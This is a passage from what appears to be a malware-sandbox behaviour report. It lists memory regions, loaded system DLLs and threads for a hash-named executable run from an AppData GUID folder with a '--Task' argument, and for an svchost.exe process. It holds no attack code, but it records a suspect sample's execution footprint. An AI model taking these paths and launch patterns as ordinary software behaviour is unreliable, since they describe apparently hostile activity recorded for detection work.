0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1257 start_va = 0x1c10000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 1258 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1259 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1260 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1261 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1262 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1263 start_va = 0x7fef9f40000 end_va = 0x7fef9f48fff monitored = 0 entry_point = 0x7fef9f411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1264 start_va = 0x7fefb5c0000 end_va = 0x7fefb615fff monitored = 0 entry_point = 0x7fefb5cbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1265 start_va = 0x1e90000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1266 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1267 start_va = 0x2520000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1268 start_va = 0x25a0000 end_va = 0x267efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 1269 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1270 start_va = 0x7fefb190000 end_va = 0x7fefb1a7fff monitored = 0 entry_point = 0x7fefb191130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1329 start_va = 0x2480000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1330 start_va = 0x2680000 end_va = 0x2faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 78 os_tid = 0xf60 Thread: id = 79 os_tid = 0xf64 Thread: id = 80 os_tid = 0xf68 Thread: id = 81 os_tid = 0xf6c Thread: id = 82 os_tid = 0xf70 Thread: id = 83 os_tid = 0xf74 Thread: id = 84 os_tid = 0xf7c Process: id = "8" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x4180b000" os_pid = "0xf80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf5c" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1271 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1272 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1273 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1274 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1275 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1276 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1277 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 1278 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1279 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1280 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1281 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1282 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1283 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1284 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1285 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1286 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1287 start_va = 0x1a0000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1288 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1289 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1290 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1291 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1292 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1293 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1294 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1295 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1296 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1297 start_va = 0x2540000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1298 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1299 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1300 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1301 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1302 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1303 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1304 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1305 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1306 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1307 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1308 start_va = 0x2540000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1309 start_va = 0x26a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 1310 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1311 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1312 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1313 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1314 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1315 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1316 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1317 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1318 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1319 start_va = 0x27a0000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1320 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1321 start_va = 0x27a0000 end_va = 0x2927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 1322 start_va = 0x2940000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 1323 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1324 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1325 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Thread: id = 85 os_tid = 0xf84 Thread: id = 86 os_tid = 0xfc4 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x96e9000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c5c1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1334 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1335 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1336 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1337 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1338 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1339 start_va = 0xc0000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1340 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1341 start_va = 0x190000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1342 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1343 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1344 start_va = 0x320000 end_va = 0x32cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1345 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1346 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1347 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1348 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1349 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1350 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1351 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1352 start_va = 0x500000 end_va = 0x501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1353 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1354 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1355 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1356 start_va = 0x5b0000 end_va = 0x737fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1357 start_va = 0x740000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1358 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1359 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1360 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1361 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1362 start_va = 0x980000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1363 start_va = 0xa00000 end_va = 0xa1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rasdlg.dll.mui" filename = "\\Windows\\System32\\en-US\\rasdlg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rasdlg.dll.mui") Region: id = 1364 start_va = 0xa20000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1365 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1366 start_va = 0xba0000 end_va = 0xe6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1367 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1368 start_va = 0xf30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1369 start_va = 0xf70000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1370 start_va = 0x1080000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1371 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1372 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 1373 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1374 start_va = 0x13d0000 end_va = 0x13dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1375 start_va = 0x13f0000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1376 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1377 start_va = 0x15b0000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 1378 start_va = 0x1710000 end_va = 0x171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1379 start_va = 0x1730000 end_va = 0x17affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 1380 start_va = 0x1920000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 1381 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1382 start_va = 0x1b00000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1383 start_va = 0x1ba0000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1384 start_va = 0x1bc0000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 1385 start_va = 0x1c40000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1386 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 1387 start_va = 0x1e20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1388 start_va = 0x1fd0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1389 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1390 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1391 start_va = 0x2130000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1392 start_va = 0x21b0000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1393 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1394 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1395 start_va = 0x2340000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1396 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1397 start_va = 0x25a0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1398 start_va = 0x32c0000 end_va = 0x333ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 1399 start_va = 0x3370000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1400 start_va = 0x73440000 end_va = 0x73442fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1401 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1402 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1403 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1404 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1405 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1406 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1407 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: 